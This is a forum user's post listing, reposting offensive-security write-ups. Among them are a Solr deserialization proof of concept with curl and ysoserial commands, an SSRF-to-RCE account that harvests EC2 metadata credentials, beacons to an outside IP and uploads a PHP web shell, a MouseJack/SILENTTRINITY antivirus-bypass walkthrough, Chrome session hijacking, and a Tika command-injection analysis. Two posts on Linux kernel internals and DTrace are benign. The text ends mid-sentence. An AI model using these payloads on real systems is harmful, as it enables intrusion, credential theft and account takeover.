Jump to content

Nytro

Administrators
  • Posts

    18753
  • Joined

  • Last visited

  • Days Won

    726

Everything posted by Nytro

  1. Mar 10, 2019 | 0 comments MouseJack: From Mouse to Shell – Part 2 This is a continuation of Part 1 which can be found here. New/Fixed Mice Since the last blog post, I’ve done some additional testing and it looks like most of the newer wireless mice are not vulnerable to MouseJack. I tested the best-selling wireless mouse on Amazon (VicTsing MM057), Amazon’s choice (AmazonBasics), and one of my favorites (Logitech M510). All three mice were not vulnerable to MouseJack. If you have a wireless mouse that cannot be patched or you are not sure how to patch it, and the mouse is older than 2017 buy a new mouse/keyboard. If you bought and tested a new mouse against MouseJack, please let me know so I can update this post. Accept the Risk or Fix the Issue? I’m still curious on how organizations are going to remedy this vulnerability across their environment. To my knowledge, you can identify the manufacturer and model from Device Manager, but because we don’t have a list of all known vulnerable mice, it’s hard to say if a particular mouse is vulnerable or not. For example, I have an old Logitech M510 that isn’t patched and a brand new Logitech M510 that is patched. From the OS level, how do we detect the difference? It would be almost impossible to validate vulnerable wireless mice/keyboards across a 60k seat enterprise. What are you doing to remedy this vulnerability or are you accepting the risk? Please comment below or reach out to me directly. From Mouse to Shell – Undetected by Defender See Part 1 to setup JackIt and CrazyRadio PA. This time, we will use JackIt and a tool known as SILENTTRINITY. SILENTTRINITY was created by Marcello Salvati (@byt3bl33d3r) in 2018. Here’s a talk Marcello gave at DerbyCon and here’s a link to his GitHub. Black Hills (BHIS) did a Webcast a few weeks ago where they did a deep dive on SILENTTRINITY, which can be found here. I won’t go into how this exactly works, but please check out the BHIS Webcast or the DerbyCon talk above for more info. Installing Dependencies Install Kali cd /opt git clone GitHub URL cd impacket pip install -r requirements.txt python setup.py install I ran into issues running this command due to the wrong version of ldap3 (see screenshot below). To fix this, run the following commands: pip2 install ldap3==2.5.1 pip2 uninstall ldap3==2.5.2 reboot? re-run step 6, it should now install successfully Installing SILENTTRINITY apt install python3.7 python3.7-dev python3-pip cd /opt git clone GitHub URL cd SILENTTRINITY/Server python3.7 -m pip install -r requirements.txt If all went well, SILENTTRINITY should be installed. Running SILENTTRINITY Start up SILENTTRINITY by running – python3.7 st.py Run the help command to see our options Review listener options Setup the listener Create the stager – I’m using powershell here, wmic is detected by Defender and msbuild requires msbuild.exe on the attack system. The stager is located in /opt/SILENTTRINITY/Server Move the stager to a HTTPS location where the file can be downloaded. Make sure you use HTTPS and not HTTP, as at least one AV vendor accidentally identifies this stager as Sparc shellcode (wtf?). Using HTTPS bypasses this Snort signature. Download and execute the stager using JackIt Once you have your session you can run modules against the compromised system. Type modules and then type list. These modules are quite powerful and allow you to run mimikatz (make sure you’re running in an elevated process), enumeration scripts, powershell, cmd, winrm, inject shellcode, exfil via github, etc. Here is an example of hostenum – which grabs sys info, av check, user groups, env variables, ipconfig, netstat and current processes. Summary: Using JackIt with SILENTTRINITY we are able to bypass Defender. I’d like to note that downloading stager.ps1 through the browser caused Defender to block the download but was able to bypass Defender by downloading and running the stager in memory. I was actually quite surprised this bypassed Defender, so I had to try it on a few other systems. I was able to bypass all 3 AV/EDR vendors using this technique; although, at least one EDR system, detected suspicious powershell usage (i.e., powershell downloaded something and ran it). Therefore, if you are able to deliver the stager another way such as say, over smb, you may be able to bypass at least a few AV/EDR. I didn’t cover the msbuild stager during this post, but if you really wanted to bypass AV/EDR try this type of stager. As long as msbuild.exe is installed on the attack system, you should be good to go (at least for now :)). In Part 3, I’ll cover the blue team side of this, as far as what to look for and how to detect SILENTTRINITY. Unfortunately, there is not an easy way to detect JackIt AFAIK. If you know of a detection mechanism for JackIt/MouseJack, please contact me so I can include it in Part 3. Sources hunter2 gitbook impacket GitHub SILENTTRINITY DerbyCon BHIS Webcast JackIt GitHub Featured Image – Bastille Sursa: https://www.jimwilbur.com/2019/03/mousejack-from-mouse-to-shell-part-2/
      • 1
      • Upvote
  2. CVE-2019-0192 - Apache Solr RCE 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5 This is an early PoC of the Apache Solr RCE From https://issues.apache.org/jira/browse/SOLR-13301: ConfigAPI allows to configure Solr's JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side. Proof Of Concept By looking on the description of the security advisory and checking on the ConfigAPI ressources of Apache Solr, we can find a reference to a JMX server: serviceUrl - (optional str) service URL for a JMX server. If not specified then the default platform MBean server will be used. By checking how ConfigAPI is working we can reproduce how to set a remote JMX server: curl -i -s -k -X $'POST' \ -H $'Host: 127.0.0.1:8983' \ -H $'Content-Type: application/json' \ --data-binary $'{\"set-property\":{\"jmx.serviceUrl\":\"service:jmx:rmi:///jndi/rmi://malicousrmierver.com:1099/obj\"}}' \ $'http://127.0.0.1:8983/solr/techproducts/config/jmx' For the PoC I will use yoserial to create a malicious RMI server using the payload Jdk7u21 Start the malicous RMI server: java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 "touch /tmp/pwn.txt" Run the POST request: curl -i -s -k -X $'POST' \ -H $'Host: 127.0.0.1:8983' \ -H $'Content-Type: application/json' \ --data-binary $'{\"set-property\":{\"jmx.serviceUrl\":\"service:jmx:rmi:///jndi/rmi://malicousrmierver.com:1099/obj\"}}' \ $'http://127.0.0.1:8983/solr/techproducts/config/jmx' note: you should get a 500 error with a nice stacktrace Check the stacktrace: If you saw this error: "Non-annotation type in annotation serial stream" it's mean that Apache Solr is running with a java version > JRE 7u25 and this poc will not work Otherwise you sould see this error: "undeclared checked exception; nested exception is" and the PoC should work. Exploit Download yoserial : https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar Change values into the script: remote = "http://172.18.0.5:8983" ressource = "" RHOST = "172.18.0.1" RPORT = "1099" Then execute the script: python3 CVE-2019-0192.py Security Advisory: http://mail-archives.us.apache.org/mod_mbox/www-announce/201903.mbox/%3CCAECwjAV1buZwg%2BMcV9EAQ19MeAWztPVJYD4zGK8kQdADFYij1w%40mail.gmail.com%3E Ressources: https://lucene.apache.org/solr/guide/6_6/config-api.html#ConfigAPI-CommandsforCommonProperties https://issues.apache.org/jira/browse/SOLR-13301 Sursa: https://github.com/mpgn/CVE-2019-0192/
  3. Escalating SSRF to RCE Home 2019 March 10 Escalating SSRF to RCE March 10, 2019 GeneralEG Hello Pentesters, I’m Youssef A. Mohamed aka GeneralEG Security Researcher @CESPPA , Cyber Security Engineer @Squnity and SRT Member @Synack Today I’m going to share a new juicy vulnerability with you as usual. This issue found in a private client so let’s call it redacted.com Exploring the scope: While enumerating the client’s domain for subdomains. I’ve found subdomain [docs] I came out to this subdomain [docs.redact.com] Finding Out-of-band resource load: The [docs] subdomain was showing some documentations and kind of statistics While clicking on a statistic’s photo I saw kind of weird but not a magical Link: the first thing that came into my mind is to change the ’s value to generaleg0x01.com Then I noticed the [mimeType] parameter so edited the link and changed the values to be like this: https://docs.redact.com/report/api/v2/help/asset?url=https://generaleg0x01.com&mimeType=text/html&t=REDACTED.JWT.TOKEN&advertiserId=11 Until now it just [Out-of-band resource load] Verifying SSRF: While checking the requests/responses in my BurpSuite noticed Response Header [X-Amz-Cf-Id] So, I’ve figured out that they are on AWS Environment. We need to make sure that SSRF is working well here. So as we know [169.254.169.254] is the EC2 instance local IP address. Let’s try to access to the meta-data folder by navigating to [/latest/meta-data/]. SSRF Confirmed. Surfing on the EC2 Environment: Let’s check our current role by navigating to [/latest/meta-data/iam/security-credentials/]. It’s aws-elasticbeanstalk-ec2-role What’s AWS Elastic Beanstalk? AWS Elastic Beanstalk, is a Platform as a Service (PaaS) offering from AWS for deploying and scaling web applications developed for various environments such as Java, .NET, PHP, Node.js, Python, Ruby and Go. It automatically handles the deployment, capacity provisioning, load balancing, auto-scaling, and application health monitoring. Grabbing the needed data: 1) Go to [/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role/] to get [AccessKeyId, SecretAccessKey, Token] 2) Go to [/latest/dynamic/instance-identity/document/] to get [instanceId, accountId, region] Configuring AWS Command Line Interface: Open your terminal: ~# apt install awscli ~# export AWS_ACCESS_KEY_ID=AccessKeyId ~# export AWS_SECRET_ACCESS_KEY=SecretAccessKey ~# export AWS_DEFAULT_REGION=region ~# export AWS_SESSION_TOKEN=Token to get the [UserID] ~# aws sts get-caller-identity SSRF exploited well, Now let’s explore further possibilities to escalate it to something Bigger “RCE”. Escalating SSRF to RCE: I went to try some potential exploitation scenarios. Escalating via [ssm send-command] fail After a few pieces of research tried to use AWS Systems Manager [ssm] command. The role is not authorized to perform this command. I was hoping to escalate it with aws ssm send-command. ~# aws ssm send-command –instance-ids “instanceId” –document-name “AWS-RunShellScript” –comment “whoami” –parameters commands=’curl 128.199.xx.xx:8080/`whoami`’ –output text –region=region An error occurred (AccessDeniedException) when calling the SendCommand operation: User: arn:aws:sts::765xxxxxxxxx:assumed-role/aws-elasticbeanstalk-ec2-role/i-007xxxxxxxxxxxxxx is not authorized to perform: ssm:SendCommand on resource: arn:aws:ec2:us-east-1:765xxxxxxxxx:instance/i-00xxxxxxxxxxxxxx Escalating via [SSH] fail SSH port is closed. I was hoping to escalate it with the famous scenario: “creating a RSA authentication key pair (public key and private key), to be able to log into a remote site from the account, without having to type the password.” Escalating via [Uploading Backdoor] Success Trying to read the [S3 Bucket] content: tried running multiple commands using AWS CLI to retrieve information from the AWS instance. However, access to most of the commands were denied due to the security policy in place. ~# aws s3 ls An error occurred (AccessDenied) when calling the ListBuckets operation: Access Denied After a few pieces of research figured that the managed policy “AWSElasticBeanstalkWebTier” only allows accessing S3 buckets whose name start with “elasticbeanstalk”. In order to access the S3 bucket, we will use the data we grabbed earlier with the following format: elasticbeanstalk-region-account-id Now, the bucket name is “elasticbeanstalk-us-east-1-76xxxxxxxx00”. Let’s listed bucket resources for “elasticbeanstalk-us-east-1-76xxxxxxxx00” in a recursive manner to perform this long-running task using AWS CLI: ~# aws s3 ls s3://elasticbeanstalk-us-east-1-76xxxxxxxx00/ –recursive Now, Let’s try to upload a Backdoor! ~# cat cmd.php <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> ~# aws s3 cp cmd.php s3://elasticbeanstalk-us-east-1-76xxxxxxxx00/ upload: ./cmd.php to s3://docs.redact.com/cmd.php And here we got a successful RCE! In a nutshell: You can escalate Server-Side Request Forgery to Remote Code Execute in many ways but it’s depending on your target’s Environment. Happy Hacking! Sursa: https://generaleg0x01.com/2019/03/10/escalating-ssrf-to-rce/
  4. linux-insides A book-in-progress about the linux kernel and its insides. The goal is simple - to share my modest knowledge about the insides of the linux kernel and help people who are interested in linux kernel insides, and other low-level subject matter. Feel free to go through the book Start here Questions/Suggestions: Feel free about any questions or suggestions by pinging me at twitter @0xAX, adding an issue or just drop me an email. Mailing List We have a Google Group mailing list for learning the kernel source code. Here are some instructions about how to use it. Join Send an email with any subject/content to kernelhacking+subscribe@googlegroups.com. Then you will receive a confirmation email. Reply it with any content and then you are done. If you have Google account, you can also open the archive page and click Apply to join group. You will be approved automatically. Send emails to mailing list Just send emails to kernelhacking@googlegroups.com. The basic usage is the same as other mailing lists powered by mailman. Archives https://groups.google.com/forum/#!forum/kernelhacking Support Support If you like linux-insides you can support me with: On other languages Brazilian Portuguese Chinese Japanese Korean Russian Spanish Turkish Contributions Feel free to create issues or pull-requests if you have any problems. Please read CONTRIBUTING.md before pushing any changes. Author @0xAX LICENSE Licensed BY-NC-SA Creative Commons. Sursa: https://0xax.gitbooks.io/linux-insides/
      • 1
      • Upvote
  5. Browser Pivot for Chrome March 11, 2019 ~ cplsec Hey all, Today’s post is about Browser Pivoting with Chrome. For anyone unaware of Browser Pivoting, it’s a technique which essentially leverages an exploited system to gain access to the browser’s authenticated sessions. This is not a new technique, in fact, Raphael Mudge wrote about it in 2013. Detailed in the linked post, the Browser Pivot module for Cobalt Strike targets IE only, and as far as I know, cannot be used against Chrome. In this post we’re trying to achieve a similar result while taking a different approach – stealing the target’s Chrome profile in real time. Just a FYI, if you have the option to use Cobalt Strike’s Browser Pivot module instead, do so, it’s much cleaner. You might be thinking – “why go through the trouble?” If I’ve exploited the system I can mimikatz or keylog to get the target’s credentials and by extension, the resources they have access to. Well, one major application that comes to mind is multi-factor authentication (MFA). Organizations are catching on that a single password alone is not nearly sufficient in protecting valued network resources, which is fantastic news! Personally, I have the opportunity to do offensive engagements on OT targets which often have multiple tiers of authentication and networking; it’s my generalization that MFA-less sites tend to fall much quicker than MFA sites – hours or days vs weeks or not at all, respectively. In my opinion, MFA at a security boundary is one of the most important security controls one can implement. You also might be thinking – “here you are touting the potency of MFA, yet you are talking about hijacking MFA sessions”. Again, this technique has been around since 2013 and the specific code developed for this PoC is all publicly accessible. Advanced adversaries have access to and are most likely employing this technique. Our offensive engagements need to emulate these threats because that’s how we get better from a defensive standpoint – steel sharpens steel. How To Defend First off, if you’ve forced an attacker to go beyond traditional credential theft to gain access to critical network resources, congratulations! This walkthrough has quite a few (loud) indicators that can point to malicious activity. We’re starting and stopping services, modifying system32 files, modifying registry, creating and deleting VSS snapshots, and ending it with a remote desktop session to the target. All this activity can easily be detected. What Does It Do? High level, this PoC attempts to do the following: Modify the system to allow multiple Remote Desktop connections and remove RemoteApp restrictions. Using VSS, copy the target’s in-use Chrome profile to another file folder. Using RemoteApp and proxychains, remotely open a Chrome instance pointing to that copied profile path. If you prefer, I think the profile could be copied over to the attacking VM and leveraged using proxychains and chromium. That being said, I would imagine this type of technique is time sensitive. Code To all the readers – this is proof of concept code, use at your own risk. ThunderRApp modifies system32 files and ThunderVSS interfaces with VSS. Just a recommendation, don’t run (shoddy) code from some rando on the internet without testing it first. ThunderChrome ThunderRApp (x64 DLL) – Modifies the system to accept multiple RDP and RemoteApp sessions ThunderVSS (x64 DLL) – Copies the target Chrome profile using VSS to get around file locks. ThunderChrome.cna – Aggressor script which runs the DLLs Enumerate Chrome Tabs (Not Included) Scenario The attackers once again have a foothold on BLANPC-0004 under the context of BLAN\Jack. Jack uses his browser to access a vCenter server in the ADMIN domain. ADMIN\Jack has different credentials than BLAN\Jack when authenticating to the vCenter server. This domain segmentation eliminates several traditional credential theft methods and pushes us into a situation where we might have to keylog or do something else. For this example, let’s also assume that the organization employs hard-token MFA, really restricting our options … way to go defenders! To give you an idea of what MFA brings to the table. Without MFA: mimikatz or keylog –> done! With MFA: mimikatz or keylog, modify system32 files, start and stop services, copy in-use files via VSS, and establish RDP sessions –> done? Multi-RemoteApp Sessions In this example, we’re trying to leverage RemoteApp to gain access to Chrome sessions. However, on unmodified Windows Workstation OSes, we cannot use RemoteApp on a target which has an active session. Below describes an attempted RDP connection to a system with an active session. Detailed in this post, termsrv.dll can be modified to permit multiple Remote Desktop sessions and by extension, RemoteApp sessions. Note, this process requires patching Windows\System32\termsrv.dll which can have major consequences, so beware. With termsrv.dll modified, multiple RemoteApp sessions can now be established while the user is active on the target system. In this example, we’re waiting for ADMIN\Jack to authenticate to the ADMIN vCenter server. So essentially, we’re continuously monitoring Chrome tabs for something vSphere related. To enumerate the tabs I used this PoC. Seeing that Jack has a vSphere tab in Chrome, we assume that session cookies for vCenter are in Jack’s Chrome profile. However, we have a major problem, when Chrome is open, profile files and other goodies are locked and inaccessible. We can get around this by creating a VSS snapshot and copying the profile files to another directory we control. With the copied Chrome profile in C:\users\public\documents\thunderchrome\default\, we start a Chrome instance with the –user-data-dir switch which points to the copied profile path. Just a FYI, when using RemoteApp With xfreerdp, I was unable to open Chrome with /app-cmd so I used c:\windows\explorer.exe instead. RemoteApp automatically opens child windows for you, pretty handy. And finally, the hijacked vCenter session through proxychains and RemoteApp. Sursa: https://ijustwannared.team/2019/03/11/browser-pivot-for-chrome/
      • 1
      • Upvote
  6. Account Takeover Using Cross-Site WebSocket Hijacking (CSWH) Sharan Panegav Mar 9 Hello , While Hunting on a private program. I found the application using WebSocket connection so I checked the WebSocket URL and I found it was vulnerable to CSWH(Cross-site websocket-hijacking) for more details about CSWH you can go through below blog https://www.christian-schneider.net/CrossSiteWebSocketHijacking.html So let’s assume an application is an establishing connection with websocket on URL wss://website.com. to verify the URL is vulnerable to CSWH I follow below steps Open the web application on browser and login into it. After this visit, http://websocket.org/echo.html in a new tab, enter the WebSocket URL and click ‘Connect’. Once the connection is established you must be able to send frames to the server from this page. Capture the websocket frames using burp proxy from a valid session and send them to see how the server responds. If the server responds in the same way as it did for the valid session then it most likely is vulnerable to Cross-Site WebSocket Hijacking By following above steps I determined the application is vulnerable to Cross-site-websocket-Hijacking. Once I established the WebSocket connection on the new tab I have received below websocket response If you observe the above response, there is parameter “forgotPasswordId” and its value is “null”. Now need to determine the value of “_forgotPasswordId” to complete the attack I decided to check the forgot password page and submitted the password reset request. Once again I checked the Websocket connection and this time observed the below Response and it contains forgotPassword token Exploit : Now to prepare the exploit of account takeover need to chain CSWH and password reset request. So I prepared below payload to send WebSocket response the attacker site using XHR. Steps: Send Password reset link to Victim (Using Forgot password page) Host the Above CSWH.html and Send URL to Vitim (Similar to CSRF attacks) Once victim click on URL you will get websocket response on your listener as show in below Image Response on Webhook Listener of attacker Once we have forgot password token we can reset the victim password Sursa: https://medium.com/@sharan.panegav/account-takeover-using-cross-site-websocket-hijacking-cswh-99cf9cea6c50
  7. DTrace on Windows Here at Microsoft, we are always looking to engage with open source communities to produce better solutions for the community and our customers . One of the more useful debugging advances that have arrived in the last decade is DTrace. DTrace of course needs no introduction: it’s a dynamic tracing framework that allows an admin or developer to get a real-time look into a system either in user or kernel mode. DTrace has a C-style high level and powerful programming language that allows you to dynamically insert trace points. Using these dynamically inserted trace points, you can filter on conditions or errors, write code to analyze lock patterns, detect deadlocks, etc. ETW while powerful, is static and does not provide the ability to programmatically insert trace points at runtime. There are a lot of websites and resources from the community to learn about DTrace. One of the most comprehensive one is the Dynamic Tracing Guide html book available on dtrace.org website. This ebook describes DTrace in detail and is the authoritative guide for DTrace. We also have Windows specific examples below which will provide more info. Starting in 2016, the OpenDTrace effort began on GitHub that tried to ensure a portable implementation of DTrace for different operating systems. We decided to add support for DTrace on Windows using this OpenDTrace port. We have created a Windows branch for “DTrace on Windows” under the OpenDTrace project on GitHub. All our changes made to support DTrace on Windows are available here. Over the next few months, we plan to work with the OpenDTrace community to merge our changes. All our source code is also available at the 3rd party sources website maintained by Microsoft. Without further ado, let’s get into how to setup and use DTrace on Windows. Install and Run DTrace Prerequisites for using the feature Windows 10 insider build 18342 or higher Only available on x64 Windows and captures tracing info only for 64-bit processes Windows Insider Program is enabled and configured with valid Windows Insider Account Visit Settings->Update & Security->Windows Insider Program for details Instructions: BCD configuration set: bcdedit /set dtrace on Note, you need to set the bcdedit option again, if you upgrade to a new Insider build Download and install the DTrace package from download center. This installs the user mode components, drivers and additional feature on demand packages necessary for DTrace to be functional. Optional: Update the PATH environment variable to include C:\Program Files\DTrace set PATH=%PATH%;"C:\Program Files\DTrace" Setup symbol path Create a new directory for caching symbols locally. Example: mkdir c:\symbols Set _NT_SYMBOL_PATH=srv*C:\symbols*http://msdl.microsoft.com/download/symbols DTrace automatically downloads the symbols necessary from the symbol server and caches to the local path. Optional: Setup Kernel debugger connection to the target machine (MSDN link). This is only required if you want to trace Kernel events using FBT or other providers. Note that you will need to disable Secureboot and Bitlocker on C:, (if enabled), if you want to setup a kernel debugger. Reboot target machine Running DTrace Launch CMD prompt in administrator mode Get started with sample one-liners: # Syscall summary by program for 5 seconds: dtrace -Fn "tick-5sec { exit(0);} syscall:::entry{ @num[pid,execname] = count();} " # Summarize timer set/cancel program for 3 seconds: dtrace -Fn "tick-3sec { exit(0);} syscall::Nt*Timer*:entry { @[probefunc, execname, pid] = count();}" # Dump System Process kernel structure: (requires symbol path to be set) dtrace -n "BEGIN{print(*(struct nt`_EPROCESS *) nt`PsInitialSystemProcess);exit(0);}" # Tracing paths through NTFS when running notepad.exe (requires KD attach): Run below command and launch notepad.exe dtrace -Fn "fbt:ntfs::/execname==\"notepad.exe\"/{}" The command dtrace -lvn syscall::: will list all the probes and their parameters available from the syscall provider. The following are some of the providers available on Windows and what they instrument. syscall – NTOS system calls fbt (Function Boundary Tracing) – Kernel function entry and returns pid – User-mode process tracing. Like kernel-mode FBT, but also allowing the instrumentation of arbitrary function offsets. etw (Event Tracing for Windows) – Allows probes to be defined for ETW This provider helps to leverage existing operating system instrumentation in DTrace. This is one addition we have done to DTrace to allow it to expose and gain all the information that Windows already provides in ETW. We have more Windows sample scripts applicable for Windows scenarios in the samples directory of the source. How to file feedback? DTrace on Windows is very different from our typical features on Windows and we are going to rely on our Insider community to guide us. If you hit any problems or bugs, please use Feedback hub to let us know. Launch feedback hub by clicking this link Select Add new feedback. Please provide a detailed description of the issue or suggestion. Currently, we do not automatically collect any debug traces, so your verbatim feedback is crucial for understanding and reproducing the issue. Pass on any verbose logs. You can set DTRACE_DEBUG environment variable to 1 to collect verbose dtrace logs. Submit DTrace Architecture Let’s talk a little about the internals and architecture of how we supported DTrace. As mentioned, DTrace on Windows is a port of OpenDTrace and reuses much of its user mode components and architecture. Users interact with DTrace through the dtrace command, which is a generic front-end to the DTrace engine. D scripts get compiled to an intermediate format (DIF) in user-space and sent to the DTrace kernel component for execution, sometimes called as the DIF Virtual Machine. This runs in the dtrace.sys driver. Traceext.sys (trace extension) is a new kernel extension driver we added, which allows Windows to expose functionality that DTrace relies on to provide tracing. The Windows kernel provides callouts during stackwalk or memory accesses which are then implemented by the trace extension. All APIs and functionality used by dtrace.sys are documented calls. Security Security of Windows is key for our customers and the security model of DTrace makes it ideally suited to Windows. The DTrace guide, linked above talks about DTrace security and performance impact. It would be useful for anyone interested in this space to read that section. At a high level, DTrace uses an intermediate form which is validated for safety and runs in its own execution environment (think C# or Java). This execution environment also handles any run time errors to avoid crashing the system. In addition, the cost of having a probe is minimal and should not visibly affect the system performance unless you enable too many probes in performance sensitive paths. DTrace on Windows also leverages the Windows security model in useful ways to enhance its security for our customers. To connect to the DTrace trace engine, your account needs to be part of the admin or LocalSystem group Events originating from kernel mode (FBT, syscalls with ‘kernel’ previous mode, etc.), are only traceable if Kernel debugger is attached To read kernel-mode memory (probe parameters for kernel-mode originated events, kernel-mode global variables, etc.), the following must be true: DTrace session security context has either TCB or LoadDriver privilege enabled. Secure Boot is not active. To trace a user-mode process, the user needs to have: Debug privilege DEBUG access to the target process. Script signing In addition, we have also updated DTrace on Windows to support signing of d scripts. We follow the same model as PowerShell to support signing of scripts. There is a system wide DTrace script signing policy knob which controls whether to check for signing or not for DTrace scripts. This policy knob is controlled by the Registry. By default, we do NOT check for signature on DTrace scripts. Use the following registry keys to enforce policy at machine or user level. User Scope: HKCU\Software\OpenDTrace\Dtrace, ExecutionPolicy, REG_SZ Machine Scope: HKLM\Software\OpenDTrace\Dtrace, ExecutionPolicy, REG_SZ Policy Values: DTrace policy take the following values. “Bypass": do not perform signature checks. This is the default policy. Only set the registry key if you want to deviate from this policy. "Unrestricted": Do not perform checks on local files, allow user's consent to use unsigned remote files. "RemoteSigned": Do not perform checks on local files, requires a valid and trusted signature for remote files. "AllSigned": Require valid and trusted signature for all files. "Restricted": Script file must be installed as a system component and have a signature from the trusted source. You can also set policy by defining the environment variable DTRACE_EXECUTION_POLICY to the required value. Conclusion We are very excited to release the first version of DTrace on Windows. We look forward to feedback from the Windows Insider community. Cheers, DTrace Team (Andrey Shedel, Gopikrishna Kannan, & Hari Pulapaka) Sursa: https://techcommunity.microsoft.com/t5/Windows-Kernel-Internals/DTrace-on-Windows/ba-p/362902
  8. Exploiting CVE-2018-1335: Command Injection in Apache Tika March 12, 2019 David Yesland Intro This post is a walk-through of steps taken to go from an undisclosed CVE for a command injection vulnerability in the Apache tika-server to a complete exploit. The CVE is https://nvd.nist.gov/vuln/detail/CVE-2018-1335. Since Apache Tika is open source, I was able to take some basic information from the CVE and identify the actual issue by analyzing the Apache Tika code. Although a command injection vulnerability is typically straightforward, as you will see in this post there were some hurdles to overcome to achieve full remote code or command execution. This was due to the way Java handles executing operating system commands and also some intricacies of the Apache Tika code itself. In the end, it was still possible to get around these blockers using the Windows Script Host (Cscript.exe). What is Apache Tika The Apache Tika™ toolkit detects and extracts metadata and text from over a thousand different file types (such as PPT, XLS, and PDF). All of these file types can be parsed through a single interface, making Tika useful for search engine indexing, content analysis, translation, and much more. (https://tika.apache.org/) Apache Tika has a few different components: a Java library, command line tool, and a standalone server (tika-server) with its own REST API. This exploit specifically is targeting the standalone server through the REST API it exposes https://wiki.apache.org/tika/TikaJAXRS. The vulnerable version is found here https://archive.apache.org/dist/tika/tika-server-1.17.jar. Breaking Down The CVE To start looking for the issue, we need to first read the CVE advisory and see what information can be taken from it to give a starting point of where to look. The description from the original advisory: Before Tika 1.18, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. Things we can tell from this description: Version 1.18 is patched Version 1.17 is unpatched The vulnerability is command injection The entry point for the vulnerability is “headers” This affects the tika-server portions of the code With this information, we now have a starting point to try and identify the vulnerability. The next steps would be to perform a diff of the patched and unpatched version of Tika, specifically the tika-server portions. Grepping the code for functions in Java known to perform operating system commands would be another good place to look. Finally, searching for sections of the tika-server code which relate to interpreting headers from what we can assume will be some kind of HTTP request. Getting Into It Doing a side-by-side recursive diff of the tika-server 1.17 vs 1.18 source directory only comes back with one file that has been modified. This is shown below cropping to just the important parts. Diffing tika-1.17/tika-server/src/main/java/org/apache/tika/server/ tika-1.18/tika-server/src/main/java/org/apache/tika/server/ Since the goal is to find command injection in a header field, having the first result be a code block which has been added in the patched version called “ALLOWABLE_HEADER_CHARS” is a pretty good start. The assumption is that this is some kind of patch trying to filter characters which could be used to inject commands into the header field. Continuing down is a large block of code inside of a function called “processHeaderConfig” which looks interesting and has been removed or changed in 1.18. It is using some variable to dynamically create a method which appears to set properties of some object and it uses the HTTP headers to do this. apache/tika/tika-server/src/main/java/org/apache/tika/server/resource/TikaResource.java Here is the description of this function: apache/tika/tika-server/src/main/java/org/apache/tika/server/resource/TikaResource.java The prefixes for the different properties were shown in the previous screenshot and are defined as static strings at the beginning of this code. apache/tika/tika-server/src/main/java/org/apache/tika/server/resource/TikaResource.java So, we have a couple static strings the can be included as HTTP headers with a request and used to set some property of an object. An example of the final header would look something like “X-Tika-OCRsomeproperty: somevalue”, “someproperty” then gets converted to a function that looks like “setSomeproperty()” and is invoked passing somevalue to it as the value to set. apache/tika/tika-server/src/main/java/org/apache/tika/server/resource/TikaResource.java Here you can see this function being used and where the prefix header is checked in the request to determine how to call the function. All the needed arguments are then passed in from the HTTP request to the “processHeaderConfig” function. Looking at the way the “processHeaderConfig” function is used, you can see the properties are being set on the “TesseractOCRConfig” object. Doing a search for places that may use the “TesseractOCRConfig” object we find: tika-parsers/src/main/java/org/apache/tika/parser/ocr/TesseractOCRParser.java which turned out to be pretty interesting. Here is the “doOCR” function from “TesseractOCRParser.java” which is passing the config properties from the “TesseractOCRConfig” object, which we just discovered, directly into an array of strings which are used to construct a command for “ProcessBuilder” and then the process is started. apache/tika/tika-server/src/main/java/org/apache/tika/parser/ocr/TesseractOCRParser.java This looks promising—if we put together all the information we have found so far we should technically be able to make some kind of HTTP request to the server, set a header that looks like “X-Tika-OCRTesseractPath: <some command>” and have this command be inserted into the cmd string and be executed. The only problem is is the “config.getTesseractPath()” is prepended to another string we cannot control, “getTesseractProg()” which ends up being a static string, “tesseract.exe”. To fix this we can wrap our command we want to execute in double quotes and Windows will ignore whatever is appended to it after the quotes, just executing our injected command. To put this to the test we can just use an example from the tika-server documentation for retrieving some metadata about a file. https://wiki.apache.org/tika/TikaJAXRS Since OCR stands for Optical Character Recognition, used for pulling text and content out of images, we will use an image to upload instead of a docx to hopefully reach the “doOCR” function. We end up with: curl -T test.tiff http://localhost:9998/meta --header "X-Tika-OCRTesseractPath: \"calc.exe\"" There you have it—the command injection was identified by wrapping a command in double quotes as the value for the “X-Tika-OCRTesseractPath” HTTP header in a PUT request while uploading an image. Can you do more than pop calc? At this point, you can see that we are just directly changing the application name that is executed. Because the command is being passed to Java ProcessBuilder as an array, we cannot actually run more than one command or add arguments to the command as a single string or the execution will fail. This is because passing an array of strings to process builder or runtime.exec in Java works like this: Characters that are normally interpreted by shells like cmd.exe or /bin/sh such as &,<,>,|,` etc. are not interpreted by ProcessBuilder and will be ignored, so you cannot break out of the command or add any arguments to it as a single string. It is not as simple as doing something like “X-Tika-OCRTesseractPath: \“cmd.exe /c some args\”, or any combination of this. Coming back to the construction of the “cmd” array you can see we have control over multiple arguments in the command as well, this is each item that looks like “config.get*()” but this is broken up by some other items we do not control. My first thought was to run “cmd.exe” and then pass in the argument “/C” as “config.getLanguage()” and then insert “||somecommand||” as “config.getPageSegMode()” which would have resulted in “somecommand” being executed. However, this did not work because prior to “doOCR” being called there is another function which is called on the “config.getTesseractPath()” string (the modified command) which simply executes just that command (the purpose was to check if the application being called is a valid application). The problem here is that would just run “cmd.exe” with no arguments and cause the server to hang since “cmd.exe” would never exit and let execution continue to the “doOCR” function. Coming Up With a Solution To go beyond running a single command we can take a deeper look at what happens when the “doOCR” function starts the process using Process Monitor. Viewing the properties of the process, when the tika-server starts it, results in the following command line which is constructed with the injected command. "calc.exe"tesseract.exe C:\Users\Test\AppData\Local\Temp\apache-tika-3299124493942985299.tmp C:\Users\Test\AppData\Local\Temp\apache-tika-7317860646082338953.tmp -l eng -psm 1 txt -c preserve_interword_spaces=0 The portions of the command we control are highlighted in red. There are 3 places we can inject into the command, 1 command and 2 arguments. Another interesting finding here is that Tika is actually creating 2 temp files and one of them is being passed as the first argument. After some further investigation I was able to confirm that the first temp file passed to the command was the contents from the file I was uploading. This meant 